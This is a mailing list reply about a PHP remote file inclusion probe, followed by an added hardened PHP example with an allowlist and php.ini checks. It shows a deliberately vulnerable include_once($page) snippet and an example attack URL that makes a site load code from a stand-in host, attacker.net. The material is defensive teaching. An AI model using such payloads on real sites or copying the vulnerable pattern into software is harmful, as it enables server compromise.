Hi Wayne,

> but recently I've been paying more attention to them.
>
> this is the log from dfix:
>
> Not really sure what it means other than it blocked the IP address.
>
> ?p=1693 is a valid link on my site, does that mean this is the page they
> tried to take over and they are coming from hackorea ?
Yeah, this is a common attack vector for PHP scripts. Someone probes your PHP scripts to see if he can trick them into loading, including and running an externally hosted PHP script. In your case the external script would just show "ShiroHigeShiroHige" somewhere within your page *if* the probing had revealed a vulnerability, and only the attacker would see that. But then the attacker would probably have escalated by including something more nasty. :o)

Say you have this code on your website:

    <?
    // This is a vulnerable index.php and the code below is a really bad idea:
    include_once($page);
    /* ... rest of your page */
    ?>

Now *if* you'd usually call subpages for your site with something like this ...

    http://www.site.com/index.php?page=<number>

... then the attacker could trick your badly coded index.php into loading an external and even remotely hosted PHP file by simply calling up your index.php this way:

    http://www.site.com/index.php?page=http://attacker.net/include_me.txt

To prevent stuff like that from happening, Blueonyx usually sets the following two switches in php.ini:

    allow_url_fopen = Off
    allow_url_include = Off

These are the safe settings for them and prevent PHP scripts from accessing and including remotely hosted non-local PHP scripts.

"allow_url_fopen" prevents PHP scripts from accessing non-local files which are called via a URL. "allow_url_include" controls whether it is allowed to include remotely hosted PHP code into your local scripts for execution. Which is a really bad idea, so it should always be set to "Off".

There may be reasons why you may want to allow "allow_url_fopen", though. Like when your PHP script needs to access a remote RSS feed, or needs to connect somewhere else to see if there are updates available for its components. However: If you allow "allow_url_fopen", be sure to double check that "allow_url_include" is set to "Off".

Short summary: Access = fine. Include = bad.
-- 
With best regards

Michael Stauber
_______________________________________________
Blueonyx mailing list
Blueonyx@mail.blueonyx.it
http://mail.blueonyx.it/mailman/listinfo/blueonyx
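As an added example (not part of Michael's post or of BlueOnyx itself), here is what the "badly coded index.php" above looks like once the include is fixed the way the reply recommends: the request parameter is only ever used as a lookup key into an allowlist of local files, so a value like `page=http://attacker.net/include_me.txt` can never reach `include_once`. The second function is a small self-check for the two php.ini switches discussed above. The `pages/` directory, the page names in `PAGE_MAP`, and the log wording are assumptions made for the illustration.

```php
<?php
// Added example, not from the original post: a hardened replacement for the
// vulnerable "include_once($page)" pattern. Request data never becomes a path;
// it only selects one entry from a fixed allowlist of local files.
// The pages/ directory and the page names below are assumptions.

declare(strict_types=1);

// Allowlist: the only files this front controller will ever load.
// Keys are what may appear in ?page=, values are files under PAGES_DIR.
const PAGES_DIR = __DIR__ . '/pages';
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a requested page name to a safe local path, or null if it is not allowed.
 * URLs, ../ sequences, php:// wrappers and so on are rejected here because they
 * are simply not keys of PAGE_MAP; include() is never reached with them.
 */
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGE_MAP)) {
        return null;
    }
    $path = realpath(PAGES_DIR . '/' . PAGE_MAP[$requested]);
    $base = realpath(PAGES_DIR);
    // Defence in depth: confirm the resolved file really lives under PAGES_DIR.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Self-check for the two php.ini switches from the reply above.
 * Returns a list of findings; an empty list means both are Off.
 */
function check_remote_include_settings(): array
{
    $findings = [];
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include is On: remotely hosted code could be '
            . 'include()d; set it to Off';
    }
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_fopen is On: only acceptable if a script must '
            . 'read remote data (e.g. an RSS feed), and only with '
            . 'allow_url_include = Off';
    }
    return $findings;
}

// Front controller: $_GET['page'] is a lookup key, never a path.
$requested = (string) ($_GET['page'] ?? 'home');
$file = resolve_page($requested);

if ($file === null) {
    http_response_code(404);
    // Log the rejected value (truncated) so probes such as
    // page=http://... are visible in the error log for review.
    error_log('Rejected page parameter: ' . substr($requested, 0, 200));
    echo 'Page not found';
    exit;
}

foreach (check_remote_include_settings() as $finding) {
    error_log('php.ini check: ' . $finding);
}

include_once $file;
```

The same idea applies to numeric links like `?p=1693`: validate the value (for example with `filter_var($_GET['p'], FILTER_VALIDATE_INT)`) and use it to look up content, rather than building a filename or URL from it. The php.ini check only reports; the actual fix is the `allow_url_fopen = Off` / `allow_url_include = Off` setting in the reply, and the allowlist keeps the script safe even on a host where those switches are left on.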